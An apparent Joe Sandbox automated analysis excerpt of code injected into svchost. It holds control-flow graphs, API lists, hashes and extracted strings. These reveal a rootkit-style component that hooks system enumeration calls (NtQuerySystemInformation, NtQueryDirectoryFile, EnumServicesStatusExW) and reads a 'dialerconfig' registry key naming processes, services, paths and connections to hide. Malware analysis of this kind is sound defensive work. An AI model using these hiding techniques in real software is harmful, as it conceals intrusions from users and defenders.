HeapFree 13982->13985 13983->13946 13989 25304fb13af 13984->13989 13985->13983 13987 25304fb13dd GetProcessHeap HeapAlloc 13987->13989 13988 25304fb142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 13988->13989 13989->13984 13989->13985 13989->13987 13989->13988 13990 25304fb1413 GetProcessHeap HeapFree 13989->13990 13997 25304fb1554 13989->13997 13990->13988 13992 25304fb11b5 RegCloseKey 13991->13992 13993 25304fb10b9 13991->13993 13992->13949 13993->13992 13994 25304fb10c7 RegEnumValueW 13993->13994 13995 25304fb1149 GetProcessHeap HeapAlloc 13993->13995 13996 25304fb117f GetProcessHeap HeapFree 13993->13996 13994->13993 13995->13993 13996->13993 13998 25304fb15a4 13997->13998 14001 25304fb156e 13997->14001 13998->13989 13999 25304fb158d StrCmpW 13999->14001 14000 25304fb1585 StrCmpIW 14000->14001 14001->13998 14001->13999 14001->14000

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                • String ID:
                                                • API String ID: 1683269324-0
                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction ID: f347dbf05d3a5696189500049bf4bfb8c0071b2b7d16366bc627253bba18f1bd
                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction Fuzzy Hash: DE118B71654F1182FB25D760BE4E39A2290A7463E7F44A0249E0A851D4EF39C34482BC

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0000025304FB1650: GetProcessHeap.KERNEL32 ref: 0000025304FB165B
                                                  • Part of subcall function 0000025304FB1650: HeapAlloc.KERNEL32 ref: 0000025304FB166A
                                                  • Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB16DA
                                                  • Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB1707
                                                  • Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB1721
                                                  • Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB1741
                                                  • Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB175C
                                                  • Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB177C
                                                  • Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB1797
                                                  • Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB17B7
                                                  • Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB17D2
                                                  • Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB17F2
                                                • Sleep.KERNEL32 ref: 0000025304FB1C43
                                                • SleepEx.KERNELBASE ref: 0000025304FB1C49
                                                  • Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB180D
                                                  • Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB182D
                                                  • Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB1848
                                                  • Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB1868
                                                  • Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB1883
                                                  • Part of subcall function 0000025304FB1650: RegOpenKeyExW.ADVAPI32 ref: 0000025304FB18A3
                                                  • Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB18BE
                                                  • Part of subcall function 0000025304FB1650: RegCloseKey.ADVAPI32 ref: 0000025304FB18C8
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                • String ID:
                                                • API String ID: 1534210851-0
                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction ID: 28fabf696d26ef73d3be29b0d2e182dae72c1de69f6a42b4190a79ea946628d1
                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction Fuzzy Hash: EB31AF76200F0191FA50DB26DF7D35A22A5AB4ABE7F1464219E09876D5DF34CB6082F8

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2636784109.0000025304F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304F80000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304f80000_svchost.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: 5f2ebb6ed0f7fd16517ced7d3f9d98b76cb44d1d83ea2180a75d84866868253c
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: 68613172702B5087EA68CF15D84876CB391FB44BE5F469029DA190B7C5DB38EB62C728

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 203 25304fb2cdc-25304fb2d55 call 25304fcecc0 206 25304fb2d5b-25304fb2d61 203->206 207 25304fb3090-25304fb30b3 203->207 206->207 208 25304fb2d67-25304fb2d6a 206->208 208->207 209 25304fb2d70-25304fb2d73 208->209 209->207 210 25304fb2d79-25304fb2d89 GetModuleHandleA 209->210 211 25304fb2d9d 210->211 212 25304fb2d8b-25304fb2d9b GetProcAddress 210->212 213 25304fb2da0-25304fb2dbe 211->213 212->213 213->207 215 25304fb2dc4-25304fb2de3 StrCmpNIW 213->215 215->207 216 25304fb2de9-25304fb2ded 215->216 216->207 217 25304fb2df3-25304fb2dfd 216->217 217->207 218 25304fb2e03-25304fb2e0a 217->218 218->207 219 25304fb2e10-25304fb2e23 218->219 220 25304fb2e25-25304fb2e31 219->220 221 25304fb2e33 219->221 222 25304fb2e36-25304fb2e3a 220->222 221->222 223 25304fb2e3c-25304fb2e48 222->223 224 25304fb2e4a 222->224 225 25304fb2e4d-25304fb2e57 223->225 224->225 226 25304fb2f4d-25304fb2f51 225->226 227 25304fb2e5d-25304fb2e60 225->227 228 25304fb3082-25304fb308a 226->228 229 25304fb2f57-25304fb2f5a 226->229 230 25304fb2e72-25304fb2e7c 227->230 231 25304fb2e62-25304fb2e6f call 25304fb1a14 227->231 228->207 228->219 234 25304fb2f5c-25304fb2f68 call 25304fb1a14 229->234 235 25304fb2f6b-25304fb2f75 229->235 232 25304fb2e7e-25304fb2e8b 230->232 233 25304fb2eb0-25304fb2eba 230->233 231->230 232->233 238 25304fb2e8d-25304fb2e9a 232->238 239 25304fb2ebc-25304fb2ec9 233->239 240 25304fb2eea-25304fb2eed 233->240 234->235 242 25304fb2fa5-25304fb2fa8 235->242 243 25304fb2f77-25304fb2f84 235->243 246 25304fb2e9d-25304fb2ea3 238->246 239->240 247 25304fb2ecb-25304fb2ed8 239->247 248 25304fb2efb-25304fb2f08 lstrlenW 240->248 249 25304fb2eef-25304fb2ef9 call 25304fb1d28 240->249 244 25304fb2fb5-25304fb2fc2 lstrlenW 242->244 245 25304fb2faa-25304fb2fb3 call 25304fb1d28 242->245 243->242 251 25304fb2f86-25304fb2f93 243->251 258 25304fb2fe5-25304fb2fef call 25304fb3930 244->258 259 25304fb2fc4-25304fb2fce 244->259 245->244 264 25304fb2ffa-25304fb3005 245->264 256 25304fb2f43-25304fb2f48 246->256 257 25304fb2ea9-25304fb2eae 246->257 260 25304fb2edb-25304fb2ee1 247->260 252 25304fb2f2b-25304fb2f3d call 25304fb3930 248->252 253 25304fb2f0a-25304fb2f14 248->253 249->248 249->256 254 25304fb2f96-25304fb2f9c 251->254 252->256 267 25304fb2ff2-25304fb2ff4 252->267 253->252 262 25304fb2f16-25304fb2f29 call 25304fb1554 253->262 263 25304fb2f9e-25304fb2fa3 254->263 254->264 256->267 257->233 257->246 258->267 259->258 268 25304fb2fd0-25304fb2fe3 call 25304fb1554 259->268 260->256 269 25304fb2ee3-25304fb2ee8 260->269 262->252 262->256 263->242 263->254 272 25304fb307c-25304fb3080 264->272 273 25304fb3007-25304fb300b 264->273 267->228 267->264 268->258 268->264 269->240 269->260 272->228 278 25304fb300d-25304fb3011 273->278 279 25304fb3013-25304fb302d call 25304fb86a0 273->279 278->279 282 25304fb3030-25304fb3033 278->282 279->282 285 25304fb3056-25304fb3059 282->285 286 25304fb3035-25304fb3053 call 25304fb86a0 282->286 285->272 288 25304fb305b-25304fb3079 call 25304fb86a0 285->288 286->285 288->272
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: 6e38e6e88eea62fa903dc9e1b1c45396e63af638434ea9b3b35fe69c5e72ccc2
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: D7B19C32210F5082EB64DF25CD4C7A963A4FB46BEAF556056EE09537D4DB35CB40C3A4

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: 1da9f3377175899e6c3d1154d9199a8308e37632685a3200987f5f2287a1cb32
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: 2A313A72204F8086EB60DF60EC443EA73A4F785795F44942ADA4D47A98EF38C748C768
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction ID: 692c19c8f0d15043dc364f1b160d9c86281d23f045ee11e63077677c892c1e53
                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction Fuzzy Hash: 4D314732204F8086EB60DF25EC4439E73A4F7897A5F505126EA9D43BA9DF38C7458B54
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: 55a9e84bc26dc822ed22ea03daf4bad879445ad9414bcf266157f4bdbc86f363
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: 92E1EC32A04B808AE700CFA4D9882DE7BB1F3457E9F10A116DE4A57BD9DE38C71AC754

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: a2edbb92a12934b173d6cfef0105b9dafe3abf162c4848495658ce8bfa164145
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: 8F712836710F5086EB10DF65ED5869923B4FB89BEAF00A111DE4D43AA8DF38C744C358

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: 9b17d36955c07c341c5d2b14c8a70b4d1944a69e128c9ee30e41f6913bf8c5a6
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: D7516A72614F44D7EB14CF62EA4839AB3A1F78ABE1F049124DE8907B94DF38C255C754

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: a5924dd38a659aeca1aa0a951421a5c5b15de6974fc8942f7820ccfb0c60c971
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: 4F31D6B4600F0AA0EB09DFA5EE5E3D43321A7453E7F81B5539519126F29E388349C3B8

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: 4e26eff6795f1e7f59177484dd760ecd6697f4f1484279a534c3adfd140af75b
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: C3211A36614B4482EB10CB25EA4C35A77A0F789BEAF509215EA5902FE8DF3CC349CB15

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: 341be3bcaca8e4c3736cf7df8ef77672136a1ea2008ce0ee53acfeddab16131a
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: 01419033614B809BE760CF62E94839AB7A5F389BD5F009125DB8907B98DF38D264CB54

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 423 25304fb75f0-25304fb75f6 424 25304fb7631-25304fb763b 423->424 425 25304fb75f8-25304fb75fb 423->425 428 25304fb7758-25304fb776d 424->428 426 25304fb75fd-25304fb7600 425->426 427 25304fb7625-25304fb7664 call 25304fb7ca0 425->427 429 25304fb7602-25304fb7605 426->429 430 25304fb7618 __scrt_dllmain_crt_thread_attach 426->430 443 25304fb7732 427->443 444 25304fb766a-25304fb767f call 25304fb7b34 427->444 431 25304fb777c-25304fb7796 call 25304fb7b34 428->431 432 25304fb776f 428->432 435 25304fb7611-25304fb7616 call 25304fb7be4 429->435 436 25304fb7607-25304fb7610 429->436 439 25304fb761d-25304fb7624 430->439 446 25304fb77cf-25304fb7800 call 25304fb7e70 431->446 447 25304fb7798-25304fb77cd call 25304fb7c5c call 25304fb7afc call 25304fb7ff8 call 25304fb7e10 call 25304fb7e34 call 25304fb7c8c 431->447 437 25304fb7771-25304fb777b 432->437 435->439 448 25304fb7734-25304fb7749 443->448 455 25304fb7685-25304fb7696 call 25304fb7ba4 444->455 456 25304fb774a-25304fb7757 call 25304fb7e70 444->456 457 25304fb7802-25304fb7808 446->457 458 25304fb7811-25304fb7817 446->458 447->437 476 25304fb7698-25304fb76bc call 25304fb7fbc call 25304fb7aec call 25304fb7b18 call 25304fb9cdc 455->476 477 25304fb76e7-25304fb76f1 call 25304fb7e10 455->477 456->428 457->458 463 25304fb780a-25304fb780c 457->463 464 25304fb785e-25304fb7874 call 25304fb3458 458->464 465 25304fb7819-25304fb7823 458->465 472 25304fb78ff-25304fb790c 463->472 484 25304fb78ac-25304fb78ae 464->484 485 25304fb7876-25304fb7878 464->485 466 25304fb782f-25304fb783d call 25304fc3358 465->466 467 25304fb7825-25304fb782d 465->467 473 25304fb7843-25304fb7858 call 25304fb75f0 466->473 488 25304fb78f5-25304fb78fd 466->488 467->473 473->464 473->488 476->477 525 25304fb76be-25304fb76c5 __scrt_dllmain_after_initialize_c 476->525 477->443 496 25304fb76f3-25304fb76ff call 25304fb7e60 477->496 486 25304fb78b0-25304fb78b3 484->486 487 25304fb78b5-25304fb78ca call 25304fb75f0 484->487 485->484 493 25304fb787a-25304fb789c call 25304fb3458 call 25304fb7758 485->493 486->487 486->488 487->488 505 25304fb78cc-25304fb78d6 487->505 488->472 493->484 517 25304fb789e-25304fb78a6 call 25304fc3358 493->517 513 25304fb7701-25304fb770b call 25304fb7d78 496->513 514 25304fb7725-25304fb7730 496->514 510 25304fb78e1-25304fb78f1 call 25304fc3358 505->510 511 25304fb78d8-25304fb78df 505->511 510->488 511->488 513->514 526 25304fb770d-25304fb771b 513->526 514->448 517->484 525->477 527 25304fb76c7-25304fb76e4 call 25304fb9c78 525->527 526->514 527->477
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 908f8819758c0405c579d0194b70f3e90f69305c4fefd8e7bd3e3c62ed705d36
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 5881C130B00F4186FB54FB6A9C4935962D1ABC77E2F24B4259E44477D6DB38CB4187B8

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 316 25304f869f0-25304f869f6 317 25304f86a31-25304f86a3b 316->317 318 25304f869f8-25304f869fb 316->318 319 25304f86b58-25304f86b6d 317->319 320 25304f869fd-25304f86a00 318->320 321 25304f86a25-25304f86a64 call 25304f870a0 318->321 325 25304f86b7c-25304f86b96 call 25304f86f34 319->325 326 25304f86b6f 319->326 323 25304f86a02-25304f86a05 320->323 324 25304f86a18 __scrt_dllmain_crt_thread_attach 320->324 339 25304f86b32 321->339 340 25304f86a6a-25304f86a7f call 25304f86f34 321->340 330 25304f86a11-25304f86a16 call 25304f86fe4 323->330 331 25304f86a07-25304f86a10 323->331 328 25304f86a1d-25304f86a24 324->328 337 25304f86bcf-25304f86c00 call 25304f87270 325->337 338 25304f86b98-25304f86bcd call 25304f8705c call 25304f86efc call 25304f873f8 call 25304f87210 call 25304f87234 call 25304f8708c 325->338 332 25304f86b71-25304f86b7b 326->332 330->328 348 25304f86c11-25304f86c17 337->348 349 25304f86c02-25304f86c08 337->349 338->332 343 25304f86b34-25304f86b49 339->343 351 25304f86a85-25304f86a96 call 25304f86fa4 340->351 352 25304f86b4a-25304f86b57 call 25304f87270 340->352 354 25304f86c5e-25304f86c74 call 25304f82858 348->354 355 25304f86c19-25304f86c23 348->355 349->348 353 25304f86c0a-25304f86c0c 349->353 370 25304f86ae7-25304f86af1 call 25304f87210 351->370 371 25304f86a98-25304f86abc call 25304f873bc call 25304f86eec call 25304f86f18 call 25304f890dc 351->371 352->319 359 25304f86cff-25304f86d0c 353->359 373 25304f86cac-25304f86cae 354->373 374 25304f86c76-25304f86c78 354->374 360 25304f86c2f-25304f86c3d call 25304f92758 355->360 361 25304f86c25-25304f86c2d 355->361 367 25304f86c43-25304f86c58 call 25304f869f0 360->367 383 25304f86cf5-25304f86cfd 360->383 361->367 367->354 367->383 370->339 392 25304f86af3-25304f86aff call 25304f87260 370->392 371->370 419 25304f86abe-25304f86ac5 __scrt_dllmain_after_initialize_c 371->419 381 25304f86cb0-25304f86cb3 373->381 382 25304f86cb5-25304f86cca call 25304f869f0 373->382 374->373 380 25304f86c7a-25304f86c9c call 25304f82858 call 25304f86b58 374->380 380->373 413 25304f86c9e-25304f86ca6 call 25304f92758 380->413 381->382 381->383 382->383 401 25304f86ccc-25304f86cd6 382->401 383->359 403 25304f86b01-25304f86b0b call 25304f87178 392->403 404 25304f86b25-25304f86b30 392->404 407 25304f86ce1-25304f86cf1 call 25304f92758 401->407 408 25304f86cd8-25304f86cdf 401->408 403->404 418 25304f86b0d-25304f86b1b 403->418 404->343 407->383 408->383 413->373 418->404 419->370 420 25304f86ac7-25304f86ae4 call 25304f89078 419->420 420->370
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2636784109.0000025304F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304F80000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304f80000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 7cb95ab0005a322a8c6a5e3b6ca98b83a4af0bfa4bbc3b3f7661b6430dce61ed
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 6C81F121600F8187FA50EB269C4935922D0EB967E3F14602DAA05CF7D6DB38CB668738

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 530 25304fb9804-25304fb9842 531 25304fb9933 530->531 532 25304fb9848-25304fb984b 530->532 534 25304fb9935-25304fb9951 531->534 533 25304fb9851 532->533 532->534 535 25304fb9854 533->535 536 25304fb992b 535->536 537 25304fb985a-25304fb9869 535->537 536->531 538 25304fb986b-25304fb986e 537->538 539 25304fb9876-25304fb9895 LoadLibraryExW 537->539 540 25304fb990d-25304fb991c GetProcAddress 538->540 541 25304fb9874 538->541 542 25304fb98ed-25304fb9902 539->542 543 25304fb9897-25304fb98a0 call 25304fc3080 539->543 540->536 545 25304fb991e-25304fb9929 540->545 546 25304fb98e1-25304fb98e8 541->546 542->540 544 25304fb9904-25304fb9907 FreeLibrary 542->544 549 25304fb98a2-25304fb98b7 call 25304fbad28 543->549 550 25304fb98cf-25304fb98d9 543->550 544->540 545->534 546->535 549->550 553 25304fb98b9-25304fb98cd LoadLibraryExW 549->553 550->546 553->542 553->550
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: de185f3a4916564fc56364fdf172a44b4c2ea4b36ec3212d2863ad6f0c3a5fd0
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: 7231F472302F4091FE52DB02AC08B992394BB0ABF6F596524DE6D473C4EF78C3458768

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: 1f6b1b0a87bfb9f4fde6206021ee2629552ed926203bae9f697805ca254bdd9a
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: 58115B22614F4086E750CB56EE4835962A0F788BFAF04A224EE5987BD4DB78CB148758

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
